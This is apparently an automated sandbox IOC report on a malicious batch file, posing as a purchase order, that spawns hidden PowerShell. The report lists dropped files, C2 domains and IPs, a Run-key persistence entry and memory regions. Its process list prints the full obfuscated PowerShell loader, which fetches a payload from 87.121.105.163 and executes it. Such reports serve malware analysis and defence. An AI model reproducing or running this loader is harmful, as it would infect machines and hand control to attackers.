IOC Report
PO_La-Tanerie04180240124.bat

loading gif

Files

File Path
Type
Category
Malicious
PO_La-Tanerie04180240124.bat
ASCII text, with very long lines (2827), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebu2p2lv.tjr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj55xv2r.52e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwenh1am.2da.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4pf1vrk.5pf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2RFY04WD6YQVVF5N4B9N.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Prezygomatic.Ben
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_La-Tanerie04180240124.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
malicious
C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe
"C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.theplays.shop/gnbc/
172.67.152.117
malicious
http://www.theplays.shop/gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9
172.67.152.117
malicious
http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9
47.91.88.207
malicious
http://pesterbdd.com/images/Pester.png4
unknown
http://nuget.org/NuGet.exe
unknown
http://87.121.105.163/Licences.ttf
87.121.105.163
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://87.121.105.163/vhhJQWfiJN142.bin
87.121.105.163
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://www.apache.org/licenses/LICENSE-2.0.html4
unknown
https://github.com/Pester/Pester
unknown
https://github.com/Pester/Pester4
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://87.121.105.163/Licences.ttfpNBl
unknown
http://www.quovadis.bm0
unknown
https://github.com/Pester/PesterXz
unknown
http://www.xmlspy.com)
unknown
https://aka.ms/pscore68
unknown
https://ocsp.quovadisoffshore.com0
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.H
unknown
http://pesterbdd.com/images/Pester.pngXz
unknown
There are 19 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.tyaer.com
47.91.88.207
malicious
www.theplays.shop
172.67.152.117
malicious
www.megabet303.lol
unknown
malicious
www.fleksibox.store
45.130.41.4
www.oyoing.com
127.0.0.1

IPs

IP
Domain
Country
Malicious
172.67.152.117
www.theplays.shop
United States
malicious
47.91.88.207
www.tyaer.com
United States
malicious
87.121.105.163
unknown
Bulgaria
127.0.0.1
www.oyoing.com
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
S2U4LH
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1340000
system
page execute and read and write
malicious
2AA0000
system
page execute and read and write
malicious
46C0000
trusted library allocation
page read and write
malicious
6018000
trusted library allocation
page read and write
malicious
3060000
trusted library allocation
page read and write
malicious
AFA5000
direct allocation
page execute and read and write
malicious
25A329E1000
trusted library allocation
page read and write
malicious
3040000
unclassified section
page execute and read and write
malicious
90A0000
direct allocation
page execute and read and write
malicious
4711000
heap
page read and write
2F10000
unkown
page readonly
4711000
heap
page read and write
7A0000
heap
page read and write
509C000
unclassified section
page read and write
4711000
heap
page read and write
5059000
stack
page read and write
255A000
unkown
page read and write
7DEC000
heap
page read and write
970000
unkown
page readonly
4711000
heap
page read and write
25A22DA6000
trusted library allocation
page read and write
4FCA000
trusted library allocation
page read and write
25A32C5C000
trusted library allocation
page read and write
2C2F000
stack
page read and write
25A3AEA9000
heap
page read and write
6956A000
unkown
page write copy
722E000
stack
page read and write
6A046000
unkown
page write copy
6B375000
unkown
page read and write
8BFF000
stack
page read and write
232C0000
direct allocation
page execute and read and write
2224000
unkown
page read and write
7732000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
6EB1000
unkown
page execute and read and write
306E000
stack
page read and write
2358C000
direct allocation
page execute and read and write
788B000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
253D000
stack
page read and write
740D000
stack
page read and write
22780000
direct allocation
page read and write
8B3C000
stack
page read and write
7DB4000
heap
page read and write
7DD4000
heap
page read and write
4711000
heap
page read and write
6B38C000
unkown
page read and write
7F2E000
stack
page read and write
837E000
stack
page read and write
6B44B000
unkown
page read and write
7FFB20260000
trusted library allocation
page read and write
7723000
heap
page read and write
4711000
heap
page read and write
CDA5000
direct allocation
page execute and read and write
2B71000
heap
page read and write
4ED5000
trusted library allocation
page read and write
83FE000
stack
page read and write
22E4E000
stack
page read and write
7FFB85902000
unkown
page readonly
3020000
unkown
page readonly
6A502000
unkown
page read and write
4711000
heap
page read and write
262E000
unkown
page read and write
4711000
heap
page read and write
31B6000
heap
page read and write
2DA0000
heap
page read and write
4711000
heap
page read and write
233ED000
direct allocation
page execute and read and write
4711000
heap
page read and write
3320000
heap
page read and write
7E52000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
DA0000
unkown
page readonly
22F5B000
stack
page read and write
9BA5000
direct allocation
page execute and read and write
6B030000
unkown
page read and write
6B3E6000
unkown
page read and write
48F000
heap
page read and write
3305000
heap
page read and write
69565000
unkown
page read and write
6AE7A000
unkown
page write copy
256E000
unkown
page read and write
25C6000
unkown
page read and write
76C8000
heap
page read and write
2B66000
heap
page read and write
21B0000
unkown
page read and write
430000
heap
page read and write
694E5000
unkown
page write copy
4711000
heap
page read and write
8C90000
heap
page read and write
6B1A0000
unkown
page write copy
6B2B9000
unkown
page read and write
901E000
stack
page read and write
4711000
heap
page read and write
26C00000
direct allocation
page read and write
3000000
direct allocation
page read and write
905C000
stack
page read and write
1F402A70000
heap
page read and write
6B4BE000
unkown
page write copy
6A0F0000
unkown
page readonly
6CC19FD000
stack
page read and write
25A3AAC6000
heap
page read and write
7E03000
heap
page read and write
7728000
heap
page read and write
25410000
unclassified section
page execute and read and write
4711000
heap
page read and write
8020000
trusted library allocation
page read and write
6B011000
unkown
page read and write
734B000
stack
page read and write
32BE000
stack
page read and write
25A3AEAE000
heap
page read and write
6B2A1000
unkown
page read and write
256E000
unkown
page read and write
2563000
unkown
page read and write
2F20000
unkown
page read and write
526000
heap
page read and write
25A3AE45000
heap
page read and write
6AD37000
unkown
page read and write
4711000
heap
page read and write
327C000
unkown
page read and write
970000
unkown
page readonly
2585000
unkown
page read and write
5DAF000
stack
page read and write
4711000
heap
page read and write
156E000
stack
page read and write
35CE000
stack
page read and write
250000
heap
page read and write
6AD39000
unkown
page write copy
7D89000
heap
page read and write
911000
heap
page read and write
694A3000
unkown
page write copy
2340000
unkown
page read and write
2D87000
heap
page read and write
3384000
trusted library allocation
page read and write
6B343000
unkown
page read and write
3680000
heap
page read and write
4718000
heap
page read and write
4711000
heap
page read and write
3B75000
remote allocation
page execute and read and write
3170000
unkown
page readonly
2F10000
unkown
page readonly
6ACE1000
unkown
page read and write
7731000
heap
page read and write
33AA000
trusted library allocation
page execute and read and write
4711000
heap
page read and write
113C000
stack
page read and write
7FFB20100000
trusted library allocation
page read and write
4930000
trusted library allocation
page execute and read and write
744A000
stack
page read and write
2E5E000
heap
page read and write
6B3ED000
unkown
page read and write
185000
unkown
page read and write
6B2E1000
unkown
page write copy
900000
unkown
page read and write
3040000
direct allocation
page read and write
7FFB1FF62000
trusted library allocation
page read and write
7D0C6A5000
stack
page read and write
4D47000
heap
page read and write
6A109000
unkown
page read and write
25A228C0000
heap
page execute and read and write
4711000
heap
page read and write
6A10A000
unkown
page write copy
6A5B2000
unkown
page execute read
4711000
heap
page read and write
25A23607000
trusted library allocation
page read and write
501B000
stack
page read and write
810B000
stack
page read and write
1178000
heap
page read and write
4711000
heap
page read and write
7DFF000
heap
page read and write
180000
unkown
page read and write
25E8000
unkown
page read and write
694CA000
unkown
page read and write
4C50000
trusted library allocation
page execute and read and write
25A22430000
trusted library allocation
page read and write
7CBE000
stack
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
6B273000
unkown
page write copy
7FFB1FF6D000
trusted library allocation
page execute and read and write
25A23164000
trusted library allocation
page read and write
4711000
heap
page read and write
A00000
heap
page read and write
8010000
trusted library allocation
page read and write
4711000
heap
page read and write
69299000
unkown
page read and write
7FFB20016000
trusted library allocation
page read and write
7EBD000
stack
page read and write
2C14000
heap
page read and write
25A3AE5F000
heap
page read and write
4711000
heap
page read and write
7DC3000
heap
page read and write
7D0E24A000
stack
page read and write
2CDE000
stack
page read and write
7DFA000
heap
page read and write
2E9B000
stack
page read and write
25A244EA000
trusted library allocation
page read and write
47F000
heap
page read and write
54AF000
stack
page read and write
7EEE000
stack
page read and write
2D60000
heap
page read and write
25C2000
unkown
page read and write
783E000
stack
page read and write
420000
unkown
page read and write
256C000
unkown
page read and write
6B2E0000
unkown
page read and write
4711000
heap
page read and write
2333000
heap
page read and write
26C10000
direct allocation
page read and write
8C52000
heap
page read and write
526000
heap
page read and write
2DD9000
heap
page read and write
17C74950000
heap
page read and write
7550000
heap
page read and write
80C0000
trusted library allocation
page read and write
3BE000
stack
page read and write
4711000
heap
page read and write
2260000
unkown
page readonly
6B36F000
unkown
page write copy
4711000
heap
page read and write
4711000
heap
page read and write
6B43F000
unkown
page read and write
694EF000
unkown
page read and write
1150000
heap
page read and write
7A10000
direct allocation
page read and write
6B3F2000
unkown
page write copy
260C000
unkown
page read and write
6AE76000
unkown
page write copy
25A3AB14000
heap
page read and write
7D0CC7E000
stack
page read and write
2224000
unkown
page read and write
4DC2000
unclassified section
page read and write
2318000
heap
page read and write
4711000
heap
page read and write
25B4000
unkown
page read and write
3150000
heap
page read and write
4711000
heap
page read and write
292F000
stack
page read and write
1CA88E00000
trusted library allocation
page read and write
2F40000
unkown
page readonly
2F50000
unkown
page read and write
2613000
unkown
page read and write
6AE61000
unkown
page read and write
25B4000
unkown
page read and write
7D0D07E000
stack
page read and write
30A0000
heap
page read and write
2F00000
unkown
page readonly
258F000
unkown
page read and write
750000
heap
page read and write
4711000
heap
page read and write
7FFB858E1000
unkown
page execute read
7FFB20190000
trusted library allocation
page read and write
4711000
heap
page read and write
430000
heap
page read and write
DB0000
heap
page read and write
4711000
heap
page read and write
6A042000
unkown
page write copy
1F402D74000
heap
page read and write
25A20AAD000
heap
page read and write
25A22F2D000
trusted library allocation
page read and write
32B0000
heap
page read and write
25D9000
unkown
page read and write
6B2A9000
unkown
page read and write
4711000
heap
page read and write
25DF000
unkown
page read and write
3162000
unkown
page read and write
6A4C0000
unkown
page readonly
6ACE6000
unkown
page read and write
4C3E000
stack
page read and write
6A055000
unkown
page read and write
25A2341F000
trusted library allocation
page read and write
2DD7000
heap
page read and write
4711000
heap
page read and write
7B9D000
stack
page read and write
258F000
unkown
page read and write
4711000
heap
page read and write
118F000
heap
page read and write
820000
unkown
page read and write
33D0000
heap
page read and write
7D7C000
stack
page read and write
4711000
heap
page read and write
149000
stack
page read and write
257F000
unkown
page read and write
6B263000
unkown
page read and write
692BB000
unkown
page write copy
6AD32000
unkown
page write copy
6B451000
unkown
page write copy
730D000
stack
page read and write
6F20000
unkown
page execute and read and write
23090000
direct allocation
page execute and read and write
48C5000
heap
page read and write
69293000
unkown
page write copy
91A5000
direct allocation
page execute and read and write
4711000
heap
page read and write
25A20AA9000
heap
page read and write
2601000
unkown
page read and write
25A3AE4C000
heap
page read and write
7FFB20020000
trusted library allocation
page execute and read and write
2DE2000
heap
page read and write
25A2314C000
trusted library allocation
page read and write
7DA8000
heap
page read and write
7BFE000
stack
page read and write
22DCE000
stack
page read and write
9D0000
unkown
page read and write
7E3C000
stack
page read and write
7FFB2001C000
trusted library allocation
page execute and read and write
4711000
heap
page read and write
6B19F000
unkown
page read and write
4711000
heap
page read and write
4880000
trusted library allocation
page read and write
22750000
direct allocation
page read and write
4711000
heap
page read and write
1170000
heap
page read and write
4711000
heap
page read and write
7FFB2011A000
trusted library allocation
page read and write
32D0000
unkown
page read and write
1CA87440000
heap
page read and write
6929E000
unkown
page write copy
2333000
heap
page read and write
4711000
heap
page read and write
3162000
unkown
page read and write
4711000
heap
page read and write
850E000
heap
page read and write
74CB000
stack
page read and write
23610000
unclassified section
page execute and read and write
4810000
heap
page read and write
7E26000
heap
page read and write
2323F000
heap
page read and write
2C2F000
stack
page read and write
512000
heap
page read and write
3CDA000
unkown
page read and write
6AE78000
unkown
page read and write
1150000
heap
page read and write
4711000
heap
page read and write
6B4C5000
unkown
page write copy
227B0000
direct allocation
page read and write
8FCC000
stack
page read and write
4711000
heap
page read and write
7FFB20270000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
7D9B000
heap
page read and write
17E000
unkown
page readonly
25DF000
unkown
page read and write
2B2F000
stack
page read and write
22C9E000
stack
page read and write
6B4C9000
unkown
page write copy
4711000
heap
page read and write
4711000
heap
page read and write
25A23FC2000
trusted library allocation
page read and write
4711000
heap
page read and write
49BE000
stack
page read and write
69F0F000
unkown
page execute read
6B354000
unkown
page write copy
25A3AD80000
heap
page read and write
4E60000
heap
page execute and read and write
6A14E000
unkown
page readonly
2DE2000
heap
page read and write
7D3E000
stack
page read and write
343C000
unkown
page read and write
4711000
heap
page read and write
2B8D000
heap
page read and write
759E000
stack
page read and write
25A3AB6E000
heap
page read and write
6AE80000
unkown
page execute read
6B49A000
unkown
page read and write
256A000
unkown
page read and write
119E000
heap
page read and write
911000
heap
page read and write
1F402AEB000
heap
page read and write
7D9E000
heap
page read and write
4711000
heap
page read and write
6B45C000
unkown
page write copy
69492000
unkown
page write copy
2F40000
unkown
page readonly
8000000
trusted library allocation
page read and write
25A209C0000
heap
page read and write
7D0CD7D000
stack
page read and write
2E66000
heap
page read and write
4711000
heap
page read and write
6B45A000
unkown
page write copy
6B4F6000
unkown
page read and write
2617000
unkown
page read and write
3375000
heap
page read and write
6B15A000
unkown
page read and write
6B0A9000
unkown
page read and write
3010000
heap
page read and write
1CA871F6000
system
page execute and read and write
4711000
heap
page read and write
2591000
unkown
page read and write
227F0000
unclassified section
page readonly
4711000
heap
page read and write
2E30000
heap
page read and write
6B3DC000
unkown
page write copy
483B000
heap
page read and write
3AC3000
unkown
page read and write
25CB000
unkown
page read and write
282F000
stack
page read and write
25A22E40000
trusted library allocation
page read and write
4711000
heap
page read and write
4E6000
heap
page read and write
2F9000
stack
page read and write
5E99000
trusted library allocation
page read and write
25FC000
unkown
page read and write
54B3000
trusted library allocation
page read and write
6CC11FB000
stack
page read and write
2B28000
heap
page read and write
180000
unkown
page read and write
26901000
unclassified section
page execute and read and write
48F000
heap
page read and write
B9A5000
direct allocation
page execute and read and write
25A244BA000
trusted library allocation
page read and write
8E8E000
stack
page read and write
6B355000
unkown
page read and write
4711000
heap
page read and write
2DE2000
heap
page read and write
7FFB20111000
trusted library allocation
page read and write
1CA87338000
heap
page read and write
6929F000
unkown
page read and write
6CC21FE000
stack
page read and write
6B0C8000
unkown
page read and write
7FFB1FF70000
trusted library allocation
page read and write
8C50000
heap
page read and write
2610000
unkown
page read and write
6A504000
unkown
page write copy
256C000
unkown
page read and write
7DBE000
stack
page read and write
6A507000
unkown
page read and write
8524000
heap
page read and write
25A3AD76000
heap
page execute and read and write
25C2000
unkown
page read and write
4711000
heap
page read and write
546E000
stack
page read and write
694E1000
unkown
page read and write
5EDB000
trusted library allocation
page read and write
32FE000
stack
page read and write
4E6000
